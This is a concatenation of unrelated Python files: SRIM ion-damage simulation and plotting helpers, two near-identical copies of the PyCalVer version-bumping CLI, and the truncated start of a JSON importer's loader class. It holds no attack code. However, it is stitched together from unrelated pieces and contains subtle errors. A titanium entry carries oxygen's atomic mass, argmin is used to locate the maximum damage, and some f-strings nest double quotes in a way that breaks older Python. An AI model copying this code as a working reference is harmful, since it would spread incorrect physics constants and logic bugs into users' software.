elem_ti_dict = {'E_d': 28.0, 'lattice': 3.0, 'surface': 2.00, 'atomic_num': 22, 'atomic_mass': 15.99}
def make_element_subfolder_name(layer: Layer, ion: Ion,
precision: precisionLitType = 'um') -> Path:
"""create a folder from layer elements and stoichiometries and ion type and energy.
precision is units of the layer width, default = 'um' """
if layer.name:
element_list_str = layer.name
else:
element_list = []
for (element, prop) in layer.elements.items():
stoich = prop['stoich']
# print(element.symbol, stoich)
if stoich == 1.0:
element_str = element.symbol
elif stoich.is_integer():
element_str = f'{element.symbol}{stoich:.0f}'
else:
element_str = f'{element.symbol}{stoich:.2f}'
# print(element_str)
element_list.append(element_str)
element_list_str = "-".join(element_list)
# print(element_list_str)
layer_width_nm = f'{layer.width / 10:.0f}nm'
layer_width_um = f'{layer.width / 10000:.0f}um'
ion_energy_kev = f'{ion.energy / 1000:.0f}keV'
if precision == 'um' or precision == 'micro':
layer_width = layer_width_um
elif precision == 'nm' or precision == 'nano':
layer_width = layer_width_nm
else:
layer_width = layer.width
data_subfolder_name = Path(f"{element_list_str}_{layer_width}_{ion.symbol}@{ion_energy_kev}")
# print(data_subfolder_name)
return data_subfolder_name
def make_data_path(layer: Layer,
ion: Ion,
data_path: Union[Path, str] = R'.\data',
precision: precisionLitType = 'um') -> Path:
"""create a folder from layer elements and stoichiometries and ion type and energy
data_path default = '.\\data'. precision is units of the layer width, default = 'um' """
data_subfolder_name = make_element_subfolder_name(layer, ion, precision)
output_directory: Path = Path(data_path) / data_subfolder_name
output_directory.mkdir(parents=True, exist_ok=True)
return output_directory
def make_image_path(layer: Layer, ion: Ion,
image_path: Union[Path, str] = R'.\images',
precision: precisionLitType = 'um') -> Path:
"""create a folder from layer elements and stoichiometries and ion type and energy
data_path default = '.\\images'. precision is units of the layer width, default = 'um' """
data_subfolder_name = make_element_subfolder_name(layer, ion, precision)
outimage_directory: Path = Path(image_path) / data_subfolder_name
outimage_directory.mkdir(parents=True, exist_ok=True)
return outimage_directory
def get_depth_damage_array(results: Results, units: str = 'nm') -> floatArray:
"""get array of [0] depths in nm and [damage] for whole target"""
if units in ('nm', 'nano'):
ratio_A_to_units = 10
elif units in ('a', 'A', 'angstrom', 'angstroms', 'Angstrom', 'Angstroms'):
ratio_A_to_units = 1
else:
raise ValueError
phon = results.phonons
dx = max(phon.depth) / 100 # ratio for eV/A to eV per measurement
energy_damage = np.array((phon.ions + phon.recoils) * dx)
depth_array = np.array(phon.depth / ratio_A_to_units)
damage_array_nm: np.ndarray[float] = np.stack((depth_array, energy_damage))
return damage_array_nm
def trunc_depth_damage_array(results: Results, units: precisionLitType = 'nm', depth: int = 0) -> floatArray:
"""Get list of damage up to given depth. <depth> given in <units>"""
depth_damage_array = get_depth_damage_array(results, units=units)
if depth > 0:
# print(depth_damage_array[0][depth_damage_array[0][:] <= depth])
depth_damage = depth_damage_array[:, depth_damage_array[0][:] <= depth]
else:
depth_damage = depth_damage_array[:]
return cast(floatArray, depth_damage) # up to depth if given otherwise all
def get_damage_array(results: Results, units: precisionLitType = 'nm', depth: int = 0) -> floatArray:
depth_damage = trunc_depth_damage_array(results, units=units, depth=depth)
damage_array = depth_damage[1]
return cast(floatArray, damage_array)
def get_damage_stats(results: Results, units: precisionLitType = 'nm', depth: int = 0) -> DamageStats:
array = trunc_depth_damage_array(results, units=units, depth=depth)
total_damage: int = int(sum(cast(Iterable[float], array[1])))
max_damage: int = int(max(array[1]))
max_ind: int = np.argmin(array[1])
depth_of_max: float = cast(float, array[0][max_ind])
return DamageStats(total_damage, max_damage, max_ind, depth_of_max)
def plot_damage_multi(results: List[Results],
save_dir: Path,
units: precisionLitType = 'nm',
depth: int = 0
) -> None:
# phon = results.phonons
if units in ('nm', 'nano'):
units_str = 'nm'
elif units in ('a', 'A', 'angstrom', 'angstroms', 'Angstrom', 'Angstroms'):
units_str = 'Angstroms'
if depth > 0:
pass
# add doted line at depth
if isinstance(results, Results):
results = [results]
fig = plt.figure()
ax = fig.add_subplot(111)
ax.set_xlabel(f'Depth [{units_str}]')
ax.set_ylabel('Collision damage [eV]')
for res in results:
depth_damage_array = trunc_depth_damage_array(res, units=units, depth=depth)
damage_stats = get_damage_stats(res, units=units, depth=depth)
ion_name = res.ioniz.ion.symbol
ion_energy = int(res.ioniz.ion.energy / 1000)
legend = f'{ion_name} @ {ion_energy} keV, damage {damage_stats.total} eV'
ax.plot(depth_damage_array[0], depth_damage_array[1], label='{}'.format(legend))
ax.legend()
fig.suptitle('Damage Energy vs. Depth', fontsize=15)
fig.set_size_inches((10, 6))
fig.savefig(os.path.join(save_dir, 'damagevsdepth_multi.png'), transparent=True)
# return fig
def plot_damage_multi_from_path(data_parent: Path,
units: precisionLitType = 'nm',
depth: int = 0,
) -> None:
loaded_data = [Results(dp) for dp in data_parent.iterdir() if dp.is_dir()]
plot_damage_multi(loaded_data, data_parent, units=units, depth=depth)
def plot_damage_energy_per_ion(results: Results, folder: Path, units: precisionLitType = 'nm') -> None:
phon = results.phonons
if units in ('nm', 'nano'):
units_str = 'nm'
depth = phon.depth / 10
elif units in ('a', 'A', 'angstrom', 'angstroms', 'Angstrom', 'Angstroms'):
units_str = 'Angstroms'
depth = phon.depth
fig, ax = plt.subplots()
energy_damage: floatArray = get_damage_array(results, units, 0)
energy_damage_sum = sum(energy_damage)
# energy_damage_kev = energy_damage_sum / 1000
# ax.plot(depth, energy_damage / phon.num_ions, label='{}'.format(folder))
legend = f'{folder.name}, {energy_damage_sum} eV'
ax.plot(depth, energy_damage / phon.num_ions, label='{}'.format(legend))
ax.set_xlabel(f'Depth [{units_str}]')
ax.set_ylabel('Collision damage [eV / ion]')
ax.legend()
fig.suptitle('Damage Energy vs. Depth', fontsize=15)
fig.set_size_inches((10, 6))
fig.savefig(os.path.join(folder, 'damagevsdepth_per_ion.png'), transparent=True)
def plot_damage_energy_total(results: Results, folder: Path, units: precisionLitType = 'nm') -> None:
phon = results.phonons
if units in ('nm', 'nano'):
units_str = 'nm'
depth = phon.depth / 10
elif units in ('a', 'A', 'angstrom', 'angstroms', 'Angstrom', 'Angstroms'):
units_str = 'Angstroms'
depth = phon.depth
fig, ax = plt.subplots()
energy_damage: floatArray = get_damage_array(results, units, 0)
energy_damage_sum: float = sum(cast(Iterable[float], energy_damage))
# energy_damage_kev = energy_damage_sum / 1000
# ax.plot(depth, energy_damage / phon.num_ions, label='{}'.format(folder))
legend = f'{folder.name}, {energy_damage_sum} eV'
ax.plot(depth, energy_damage, label='{}'.format(legend))
ax.set_xlabel(f'Depth [{units_str}]')
ax.set_ylabel(f'Collision damage [eV] (total from {phon.num_ions} ions')
ax.legend()
fig.suptitle('Damage Energy vs. Depth', fontsize=15)
fig.set_size_inches((10, 6))
fig.savefig(os.path.join(folder, 'damagevsdepth_total.png'), transparent=True)
def run_srim(ion: Ion,
target: Target,
data_out_dir: Path,
num_ions: int, srim_dir: Path) -> Results:
# use layer, data_path and iob to create out_dir
# run trim, return out_dir and result
# copy result to out_dir from srim_dir
trim = TRIM(target, ion, number_ions=num_ions, calculation=1) # 1 million -> about 5 hours
results = trim.run(srim_dir)
TRIM.copy_output_files(srim_dir, data_out_dir)
print(f'{ion.symbol}-{ion.energy/1000}kev done')
return results
def plot_srim(results: Results,
image_out_dir: Path,
units: precisionLitType = 'nm',
total: bool = True,
per_ion: bool = True,
) -> None:
if total:
plot_damage_energy_total(results, image_out_dir, units=units)
if per_ion:
plot_damage_energy_per_ion(results, image_out_dir, units=units)
def combined_srim(ion: Ion,
target: Target,
data_path: Path,
num_ions: int,
srim_dir: Path) -> SrimData:
# run ions in list against layer and datapath
# get out_dir and result
# create list of folders and list of results
start = datetime.now()
pid = os.getpid() # if using processpool
data_out_dir = make_data_path(target.layers[0], ion, data_path)
image_out_dir = data_out_dir # make_image_path(target.layers[0], ion, data_path)
print(f"{data_out_dir.name} started) using PID {pid}")
result = run_srim(ion, target, data_out_dir, num_ions, srim_dir)
damage_stats = get_damage_stats(result)
damage_total = damage_stats.total
damage_array = get_depth_damage_array(result)
plot_srim(result, image_out_dir)
datum = SrimData(data_out_dir, ion, num_ions, target, damage_total, damage_array)
end = datetime.now()
duration = end - start
print(f"{data_out_dir.name} done in {str(duration).split('.', 2)[0]}") # " using PID {pid}")
return datum
def create_ion_list(ion_name: Literal['H', 'He', 'Li'],
energy_list: Union[Sequence[int], Set[int]],
units: Literal['ev', 'kev', 'mev']
) -> List[Ion]:
ion_list = [Ion(f'{ion_name}', energy=x * 1000) for x in energy_list]
return ion_list
def pool_srim(ions: Union[Sequence[Ion], Set[Ion]],
target: Target, data_path: Path, num_ions: int, srim_dir: Path) -> List[SrimData]: # List[SrimData]
# with ProcessPoolExecutor(max_workers=mp.cpu_count() - 1) as ppexc:
with ProcessPoolExecutor(max_workers=mp.cpu_count() * 5) as ppexc:
"""# using submit() and list comprehension
SrimData_futures = [ppexc.submit(combined_srim,
ion,
target,
data_path,
num_ions=1_000_000, # 1 million -> about 5 hours
srim_dir=srim_executable_directory)
for ion in ions_He_list]
"""
SrimData_futures = []
for ion in ions:
res = ppexc.submit(combined_srim,
ion,
target,
data_path,
num_ions, # 1 million -> about 5 hours
srim_dir)
sleep(1)
SrimData_futures.append(res)
"""
# alternate using map() and repeat(). # returns results in order done
SrimData_futures = ppexc.map(combined_srim,
[Ion('He', energy=1000000), Ion('He', energy=2000000)],
repeat(target),
repeat(data_path),
repeat(1_000_000), # 1 million -> about 5 hours
repeat(srim_executable_directory))
"""
Srim_data_list: List[SrimData] = [f.result() for f in as_completed(SrimData_futures)]
print(f"{len(Srim_data_list)} jobs done")
return Srim_data_list
def pickle_srim(srimdata: Union[SrimData, Sequence[SrimData]]) -> None:
# sequence or iterable?
if isinstance(srimdata, SrimData):
srimdata = [srimdata]
for srim_x in srimdata:
datapath = srim_x.folder / "result.pkl"
with open(datapath, "w+b") as pkl_f:
pickle.dump(srim_x, pkl_f)
print(f"Data pickled to {datapath}")
def json_srim(srimdata: List[SrimData]) -> None:
data_ref = srimdata if isinstance(srimdata, SrimData) else srimdata[0]
datapath = data_ref.folder.parent / "result.json"
with open(datapath, "w+") as json_f:
json.dump(srimdata, json_f)
print(f"Data save as json to {datapath}")
|
#!/usr/bin/env python
# This file is part of the pycalver project
# https://gitlab.com/mbarkhau/pycalver
#
# Copyright (c) 2019 Manuel Barkhau (mbarkhau@gmail.com) - MIT License
# SPDX-License-Identifier: MIT
"""
CLI module for PyCalVer.
Provided subcommands: show, test, init, bump
"""
import sys
import typing as typ
import logging
import subprocess as sp
import click
from . import vcs
from . import config
from . import rewrite
from . import version
_VERBOSE = 0
try:
import pretty_traceback
pretty_traceback.install()
except ImportError:
pass # no need to fail because of missing dev dependency
click.disable_unicode_literals_warning = True
VALID_RELEASE_VALUES = ("alpha", "beta", "dev", "rc", "post", "final")
logger = logging.getLogger("pycalver.cli")
def _configure_logging(verbose: int = 0) -> None:
if verbose >= 2:
log_format = "%(asctime)s.%(msecs)03d %(levelname)-7s %(name)-17s - %(message)s"
log_level = logging.DEBUG
elif verbose == 1:
log_format = "%(levelname)-7s - %(message)s"
log_level = logging.INFO
else:
log_format = "%(levelname)-7s - %(message)s"
log_level = logging.INFO
logging.basicConfig(level=log_level, format=log_format, datefmt="%Y-%m-%dT%H:%M:%S")
logger.debug("Logging configured.")
def _validate_release_tag(release: str) -> None:
if release in VALID_RELEASE_VALUES:
return
logger.error(f"Invalid argument --release={release}")
logger.error(f"Valid arguments are: {", ".join(VALID_RELEASE_VALUES)}")
sys.exit(1)
@click.group()
@click.version_option(version="v202007.0036")
@click.help_option()
@click.option('-v', '--verbose', count=True, help="Control log level. -vv for debug level.")
def cli(verbose: int = 0) -> None:
"""Automatically update PyCalVer version strings on python projects."""
global _VERBOSE
_VERBOSE = verbose
@cli.command()
@click.argument("old_version")
@click.argument("pattern", default="{pycalver}")
@click.option('-v', '--verbose', count=True, help="Control log level. -vv for debug level.")
@click.option(
"--release", default=None, metavar="<name>", help="Override release name of current_version"
)
@click.option("--major", is_flag=True, default=False, help="Increment major component.")
@click.option("--minor", is_flag=True, default=False, help="Increment minor component.")
@click.option("--patch", is_flag=True, default=False, help="Increment patch component.")
def test(
old_version: str,
pattern : str = "{pycalver}",
verbose : int = 0,
release : str = None,
major : bool = False,
minor : bool = False,
patch : bool = False,
) -> None:
"""Increment a version number for demo purposes."""
_configure_logging(verbose=max(_VERBOSE, verbose))
if release:
_validate_release_tag(release)
new_version = version.incr(
old_version, pattern=pattern, release=release, major=major, minor=minor, patch=patch
)
if new_version is None:
logger.error(f"Invalid version '{old_version}' and/or pattern '{pattern}'.")
sys.exit(1)
pep440_version = version.to_pep440(new_version)
click.echo(f"New Version: {new_version}")
click.echo(f"PEP440 : {pep440_version}")
def _update_cfg_from_vcs(cfg: config.Config, fetch: bool) -> config.Config:
try:
vcs_api = vcs.get_vcs_api()
logger.debug(f"vcs found: {vcs_api.name}")
if fetch:
logger.info("fetching tags from remote (to turn off use: -n / --no-fetch)")
vcs_api.fetch()
version_tags = [
tag for tag in vcs_api.ls_tags() if version.is_valid(tag, cfg.version_pattern)
]
if version_tags:
version_tags.sort(reverse=True)
logger.debug(f"found {len(version_tags)} tags: {version_tags[:2]}")
latest_version_tag = version_tags[0]
latest_version_pep440 = version.to_pep440(latest_version_tag)
if latest_version_tag > cfg.current_version:
logger.info(f"Working dir version : {cfg.current_version}")
logger.info(f"Latest version from {vcs_api.name:>3} tag: {latest_version_tag}")
cfg = cfg._replace(
current_version=latest_version_tag, pep440_version=latest_version_pep440
)
else:
logger.debug("no vcs tags found")
except OSError:
logger.debug("No vcs found")
return cfg
@cli.command()
@click.option('-v', '--verbose', count=True, help="Control log level. -vv for debug level.")
@click.option(
"-f/-n", "--fetch/--no-fetch", is_flag=True, default=True, help="Sync tags from remote origin."
)
def show(verbose: int = 0, fetch: bool = True) -> None:
"""Show current version."""
_configure_logging(verbose=max(_VERBOSE, verbose))
ctx: config.ProjectContext = config.init_project_ctx(project_path=".")
cfg: config.MaybeConfig = config.parse(ctx)
if cfg is None:
logger.error("Could not parse configuration. Perhaps try 'pycalver init'.")
sys.exit(1)
cfg = _update_cfg_from_vcs(cfg, fetch=fetch)
click.echo(f"Current Version: {cfg.current_version}")
click.echo(f"PEP440 : {cfg.pep440_version}")
@cli.command()
@click.option('-v', '--verbose', count=True, help="Control log level. -vv for debug level.")
@click.option(
"--dry", default=False, is_flag=True, help="Display diff of changes, don't rewrite files."
)
def init(verbose: int = 0, dry: bool = False) -> None:
"""Initialize [pycalver] configuration."""
_configure_logging(verbose=max(_VERBOSE, verbose))
ctx: config.ProjectContext = config.init_project_ctx(project_path=".")
cfg: config.MaybeConfig = config.parse(ctx)
if cfg:
logger.error(f"Configuration already initialized in {ctx.config_filepath}")
sys.exit(1)
if dry:
click.echo(f"Exiting because of '--dry'. Would have written to {ctx.config_filepath}:")
cfg_text: str = config.default_config(ctx)
click.echo("\n " + "\n ".join(cfg_text.splitlines()))
sys.exit(0)
config.write_content(ctx)
def _assert_not_dirty(vcs_api: vcs.VCSAPI, filepaths: typ.Set[str], allow_dirty: bool) -> None:
dirty_files = vcs_api.status(required_files=filepaths)
if dirty_files:
logger.warning(f"{vcs_api.name} working directory is not clean. Uncomitted file(s):")
for dirty_file in dirty_files:
logger.warning(" " + dirty_file)
if not allow_dirty and dirty_files:
sys.exit(1)
dirty_pattern_files = set(dirty_files) & filepaths
if dirty_pattern_files:
logger.error("Not commiting when pattern files are dirty:")
for dirty_file in dirty_pattern_files:
logger.warning(" " + dirty_file)
sys.exit(1)
def _commit(
cfg: config.Config, new_version: str, vcs_api: vcs.VCSAPI, filepaths: typ.Set[str]
) -> None:
for filepath in filepaths:
vcs_api.add(filepath)
vcs_api.commit(f"bump version to {new_version}")
if cfg.commit and cfg.tag:
vcs_api.tag(new_version)
if cfg.commit and cfg.tag and cfg.push:
vcs_api.push(new_version)
def _bump(cfg: config.Config, new_version: str, allow_dirty: bool = False) -> None:
vcs_api: typ.Optional[vcs.VCSAPI] = None
if cfg.commit:
try:
vcs_api = vcs.get_vcs_api()
except OSError:
logger.warning("Version Control System not found, aborting commit.")
filepaths = set(cfg.file_patterns.keys())
if vcs_api:
_assert_not_dirty(vcs_api, filepaths, allow_dirty)
try:
new_vinfo = version.parse_version_info(new_version, cfg.version_pattern)
rewrite.rewrite(cfg.file_patterns, new_vinfo)
except Exception as ex:
logger.error(str(ex))
sys.exit(1)
if vcs_api:
_commit(cfg, new_version, vcs_api, filepaths)
def _try_bump(cfg: config.Config, new_version: str, allow_dirty: bool = False) -> None:
try:
_bump(cfg, new_version, allow_dirty)
except sp.CalledProcessError as ex:
logger.error(f"Error running subcommand: {ex.cmd}")
if ex.stdout:
sys.stdout.write(ex.stdout.decode('utf-8'))
if ex.stderr:
sys.stderr.write(ex.stderr.decode('utf-8'))
sys.exit(1)
def _print_diff(cfg: config.Config, new_version: str) -> None:
new_vinfo = version.parse_version_info(new_version, cfg.version_pattern)
diff: str = rewrite.diff(new_vinfo, cfg.file_patterns)
if sys.stdout.isatty():
for line in diff.splitlines():
if line.startswith("+++") or line.startswith("---"):
click.echo(line)
elif line.startswith("+"):
click.echo("\u001b[32m" + line + "\u001b[0m")
elif line.startswith("-"):
click.echo("\u001b[31m" + line + "\u001b[0m")
elif line.startswith("@"):
click.echo("\u001b[36m" + line + "\u001b[0m")
else:
click.echo(line)
else:
click.echo(diff)
def _try_print_diff(cfg: config.Config, new_version: str) -> None:
try:
_print_diff(cfg, new_version)
except Exception as ex:
logger.error(str(ex))
sys.exit(1)
@cli.command()
@click.option("-v", "--verbose", count=True, help="Control log level. -vv for debug level.")
@click.option(
"-f/-n", "--fetch/--no-fetch", is_flag=True, default=True, help="Sync tags from remote origin."
)
@click.option(
"--dry", default=False, is_flag=True, help="Display diff of changes, don't rewrite files."
)
@click.option(
"--release",
default=None,
metavar="<name>",
help=(
f"Override release name of current_version. Valid options are: "
f"{", ".join(VALID_RELEASE_VALUES)}."
),
)
@click.option(
"--allow-dirty",
default=False,
is_flag=True,
help=(
"Commit even when working directory is has uncomitted changes. "
"(WARNING: The commit will still be aborted if there are uncomitted "
"to files with version strings."
),
)
@click.option("--major", is_flag=True, default=False, help="Increment major component.")
@click.option("--minor", is_flag=True, default=False, help="Increment minor component.")
@click.option("--patch", is_flag=True, default=False, help="Increment patch component.")
def bump(
release : typ.Optional[str] = None,
verbose : int = 0,
dry : bool = False,
allow_dirty: bool = False,
fetch : bool = True,
major : bool = False,
minor : bool = False,
patch : bool = False,
) -> None:
"""Increment the current version string and update project files."""
verbose = max(_VERBOSE, verbose)
_configure_logging(verbose)
if release:
_validate_release_tag(release)
ctx: config.ProjectContext = config.init_project_ctx(project_path=".")
cfg: config.MaybeConfig = config.parse(ctx)
if cfg is None:
logger.error("Could not parse configuration. Perhaps try 'pycalver init'.")
sys.exit(1)
cfg = _update_cfg_from_vcs(cfg, fetch=fetch)
old_version = cfg.current_version
new_version = version.incr(
old_version,
pattern=cfg.version_pattern,
release=release,
major=major,
minor=minor,
patch=patch,
)
if new_version is None:
is_semver = "{semver}" in cfg.version_pattern
has_semver_inc = major or minor or patch
if is_semver and not has_semver_inc:
logger.warning("bump --major/--minor/--patch required when using semver.")
else:
logger.error(f"Invalid version '{old_version}' and/or pattern '{cfg.version_pattern}'.")
sys.exit(1)
logger.info(f"Old Version: {old_version}")
logger.info(f"New Version: {new_version}")
if dry or verbose >= 2:
_try_print_diff(cfg, new_version)
if dry:
return
_try_bump(cfg, new_version, allow_dirty)
if __name__ == '__main__':
cli()
| #!/usr/bin/env python
# This file is part of the pycalver project
# https://gitlab.com/mbarkhau/pycalver
#
# Copyright (c) 2019 Manuel Barkhau (mbarkhau@gmail.com) - MIT License
# SPDX-License-Identifier: MIT
"""
CLI module for PyCalVer.
Provided subcommands: show, test, init, bump
"""
import sys
import typing as typ
import logging
import subprocess as sp
import click
from . import vcs
from . import config
from . import rewrite
from . import version
_VERBOSE = 0
try:
import pretty_traceback
pretty_traceback.install()
except ImportError:
pass # no need to fail because of missing dev dependency
click.disable_unicode_literals_warning = True
VALID_RELEASE_VALUES = ("alpha", "beta", "dev", "rc", "post", "final")
logger = logging.getLogger("pycalver.cli")
def _configure_logging(verbose: int = 0) -> None:
if verbose >= 2:
log_format = "%(asctime)s.%(msecs)03d %(levelname)-7s %(name)-17s - %(message)s"
log_level = logging.DEBUG
elif verbose == 1:
log_format = "%(levelname)-7s - %(message)s"
log_level = logging.INFO
else:
log_format = "%(levelname)-7s - %(message)s"
log_level = logging.INFO
logging.basicConfig(level=log_level, format=log_format, datefmt="%Y-%m-%dT%H:%M:%S")
logger.debug("Logging configured.")
def _validate_release_tag(release: str) -> None:
if release in VALID_RELEASE_VALUES:
return
logger.error(f"Invalid argument --release={release}")
logger.error(f"Valid arguments are: {', '.join(VALID_RELEASE_VALUES)}")
sys.exit(1)
@click.group()
@click.version_option(version="v202007.0036")
@click.help_option()
@click.option('-v', '--verbose', count=True, help="Control log level. -vv for debug level.")
def cli(verbose: int = 0) -> None:
"""Automatically update PyCalVer version strings on python projects."""
global _VERBOSE
_VERBOSE = verbose
@cli.command()
@click.argument("old_version")
@click.argument("pattern", default="{pycalver}")
@click.option('-v', '--verbose', count=True, help="Control log level. -vv for debug level.")
@click.option(
"--release", default=None, metavar="<name>", help="Override release name of current_version"
)
@click.option("--major", is_flag=True, default=False, help="Increment major component.")
@click.option("--minor", is_flag=True, default=False, help="Increment minor component.")
@click.option("--patch", is_flag=True, default=False, help="Increment patch component.")
def test(
old_version: str,
pattern : str = "{pycalver}",
verbose : int = 0,
release : str = None,
major : bool = False,
minor : bool = False,
patch : bool = False,
) -> None:
"""Increment a version number for demo purposes."""
_configure_logging(verbose=max(_VERBOSE, verbose))
if release:
_validate_release_tag(release)
new_version = version.incr(
old_version, pattern=pattern, release=release, major=major, minor=minor, patch=patch
)
if new_version is None:
logger.error(f"Invalid version '{old_version}' and/or pattern '{pattern}'.")
sys.exit(1)
pep440_version = version.to_pep440(new_version)
click.echo(f"New Version: {new_version}")
click.echo(f"PEP440 : {pep440_version}")
def _update_cfg_from_vcs(cfg: config.Config, fetch: bool) -> config.Config:
try:
vcs_api = vcs.get_vcs_api()
logger.debug(f"vcs found: {vcs_api.name}")
if fetch:
logger.info("fetching tags from remote (to turn off use: -n / --no-fetch)")
vcs_api.fetch()
version_tags = [
tag for tag in vcs_api.ls_tags() if version.is_valid(tag, cfg.version_pattern)
]
if version_tags:
version_tags.sort(reverse=True)
logger.debug(f"found {len(version_tags)} tags: {version_tags[:2]}")
latest_version_tag = version_tags[0]
latest_version_pep440 = version.to_pep440(latest_version_tag)
if latest_version_tag > cfg.current_version:
logger.info(f"Working dir version : {cfg.current_version}")
logger.info(f"Latest version from {vcs_api.name:>3} tag: {latest_version_tag}")
cfg = cfg._replace(
current_version=latest_version_tag, pep440_version=latest_version_pep440
)
else:
logger.debug("no vcs tags found")
except OSError:
logger.debug("No vcs found")
return cfg
@cli.command()
@click.option('-v', '--verbose', count=True, help="Control log level. -vv for debug level.")
@click.option(
"-f/-n", "--fetch/--no-fetch", is_flag=True, default=True, help="Sync tags from remote origin."
)
def show(verbose: int = 0, fetch: bool = True) -> None:
"""Show current version."""
_configure_logging(verbose=max(_VERBOSE, verbose))
ctx: config.ProjectContext = config.init_project_ctx(project_path=".")
cfg: config.MaybeConfig = config.parse(ctx)
if cfg is None:
logger.error("Could not parse configuration. Perhaps try 'pycalver init'.")
sys.exit(1)
cfg = _update_cfg_from_vcs(cfg, fetch=fetch)
click.echo(f"Current Version: {cfg.current_version}")
click.echo(f"PEP440 : {cfg.pep440_version}")
@cli.command()
@click.option('-v', '--verbose', count=True, help="Control log level. -vv for debug level.")
@click.option(
"--dry", default=False, is_flag=True, help="Display diff of changes, don't rewrite files."
)
def init(verbose: int = 0, dry: bool = False) -> None:
"""Initialize [pycalver] configuration."""
_configure_logging(verbose=max(_VERBOSE, verbose))
ctx: config.ProjectContext = config.init_project_ctx(project_path=".")
cfg: config.MaybeConfig = config.parse(ctx)
if cfg:
logger.error(f"Configuration already initialized in {ctx.config_filepath}")
sys.exit(1)
if dry:
click.echo(f"Exiting because of '--dry'. Would have written to {ctx.config_filepath}:")
cfg_text: str = config.default_config(ctx)
click.echo("\n " + "\n ".join(cfg_text.splitlines()))
sys.exit(0)
config.write_content(ctx)
def _assert_not_dirty(vcs_api: vcs.VCSAPI, filepaths: typ.Set[str], allow_dirty: bool) -> None:
dirty_files = vcs_api.status(required_files=filepaths)
if dirty_files:
logger.warning(f"{vcs_api.name} working directory is not clean. Uncomitted file(s):")
for dirty_file in dirty_files:
logger.warning(" " + dirty_file)
if not allow_dirty and dirty_files:
sys.exit(1)
dirty_pattern_files = set(dirty_files) & filepaths
if dirty_pattern_files:
logger.error("Not commiting when pattern files are dirty:")
for dirty_file in dirty_pattern_files:
logger.warning(" " + dirty_file)
sys.exit(1)
def _commit(
cfg: config.Config, new_version: str, vcs_api: vcs.VCSAPI, filepaths: typ.Set[str]
) -> None:
for filepath in filepaths:
vcs_api.add(filepath)
vcs_api.commit(f"bump version to {new_version}")
if cfg.commit and cfg.tag:
vcs_api.tag(new_version)
if cfg.commit and cfg.tag and cfg.push:
vcs_api.push(new_version)
def _bump(cfg: config.Config, new_version: str, allow_dirty: bool = False) -> None:
vcs_api: typ.Optional[vcs.VCSAPI] = None
if cfg.commit:
try:
vcs_api = vcs.get_vcs_api()
except OSError:
logger.warning("Version Control System not found, aborting commit.")
filepaths = set(cfg.file_patterns.keys())
if vcs_api:
_assert_not_dirty(vcs_api, filepaths, allow_dirty)
try:
new_vinfo = version.parse_version_info(new_version, cfg.version_pattern)
rewrite.rewrite(cfg.file_patterns, new_vinfo)
except Exception as ex:
logger.error(str(ex))
sys.exit(1)
if vcs_api:
_commit(cfg, new_version, vcs_api, filepaths)
def _try_bump(cfg: config.Config, new_version: str, allow_dirty: bool = False) -> None:
try:
_bump(cfg, new_version, allow_dirty)
except sp.CalledProcessError as ex:
logger.error(f"Error running subcommand: {ex.cmd}")
if ex.stdout:
sys.stdout.write(ex.stdout.decode('utf-8'))
if ex.stderr:
sys.stderr.write(ex.stderr.decode('utf-8'))
sys.exit(1)
def _print_diff(cfg: config.Config, new_version: str) -> None:
new_vinfo = version.parse_version_info(new_version, cfg.version_pattern)
diff: str = rewrite.diff(new_vinfo, cfg.file_patterns)
if sys.stdout.isatty():
for line in diff.splitlines():
if line.startswith("+++") or line.startswith("---"):
click.echo(line)
elif line.startswith("+"):
click.echo("\u001b[32m" + line + "\u001b[0m")
elif line.startswith("-"):
click.echo("\u001b[31m" + line + "\u001b[0m")
elif line.startswith("@"):
click.echo("\u001b[36m" + line + "\u001b[0m")
else:
click.echo(line)
else:
click.echo(diff)
def _try_print_diff(cfg: config.Config, new_version: str) -> None:
try:
_print_diff(cfg, new_version)
except Exception as ex:
logger.error(str(ex))
sys.exit(1)
@cli.command()
@click.option("-v", "--verbose", count=True, help="Control log level. -vv for debug level.")
@click.option(
"-f/-n", "--fetch/--no-fetch", is_flag=True, default=True, help="Sync tags from remote origin."
)
@click.option(
"--dry", default=False, is_flag=True, help="Display diff of changes, don't rewrite files."
)
@click.option(
"--release",
default=None,
metavar="<name>",
help=(
f"Override release name of current_version. Valid options are: "
f"{', '.join(VALID_RELEASE_VALUES)}."
),
)
@click.option(
"--allow-dirty",
default=False,
is_flag=True,
help=(
"Commit even when working directory is has uncomitted changes. "
"(WARNING: The commit will still be aborted if there are uncomitted "
"to files with version strings."
),
)
@click.option("--major", is_flag=True, default=False, help="Increment major component.")
@click.option("--minor", is_flag=True, default=False, help="Increment minor component.")
@click.option("--patch", is_flag=True, default=False, help="Increment patch component.")
def bump(
release : typ.Optional[str] = None,
verbose : int = 0,
dry : bool = False,
allow_dirty: bool = False,
fetch : bool = True,
major : bool = False,
minor : bool = False,
patch : bool = False,
) -> None:
"""Increment the current version string and update project files."""
verbose = max(_VERBOSE, verbose)
_configure_logging(verbose)
if release:
_validate_release_tag(release)
ctx: config.ProjectContext = config.init_project_ctx(project_path=".")
cfg: config.MaybeConfig = config.parse(ctx)
if cfg is None:
logger.error("Could not parse configuration. Perhaps try 'pycalver init'.")
sys.exit(1)
cfg = _update_cfg_from_vcs(cfg, fetch=fetch)
old_version = cfg.current_version
new_version = version.incr(
old_version,
pattern=cfg.version_pattern,
release=release,
major=major,
minor=minor,
patch=patch,
)
if new_version is None:
is_semver = "{semver}" in cfg.version_pattern
has_semver_inc = major or minor or patch
if is_semver and not has_semver_inc:
logger.warning("bump --major/--minor/--patch required when using semver.")
else:
logger.error(f"Invalid version '{old_version}' and/or pattern '{cfg.version_pattern}'.")
sys.exit(1)
logger.info(f"Old Version: {old_version}")
logger.info(f"New Version: {new_version}")
if dry or verbose >= 2:
_try_print_diff(cfg, new_version)
if dry:
return
_try_bump(cfg, new_version, allow_dirty)
if __name__ == '__main__':
cli()
|
import json
import logging
import re
import time
from json import JSONDecodeError
from typing import Optional, Tuple, Dict, Any
from requests import HTTPError, Response
from importer import JSON
from importer.functions import requests_get
from importer.models import CachedObject
logger = logging.getLogger(__name__)
class BaseLoader:
"""Provides a json and file download function.
This class can be overwritten for vendor specific fixups
"""
def __init__(self, system: JSON) -> None:
self.system = system
def load(self, url: str, query: Optional[Dict[str, str]] = None) -> JSON:
logger.debug(f"Loader is loading {url}")
if query is None:
query = dict()
response = requests_get(url, params=query)
data = response.json()
if data is None: # json() can actually return None
data = dict()
if "id" in data and data["id"] != url:
logger.warning(f"Mismatch between url and id. url: {url} id: {data["id"]}")
return data
def load_file(self, url: str) -> Tuple[bytes, Optional[str]]:
"""Returns the content and the content type"""
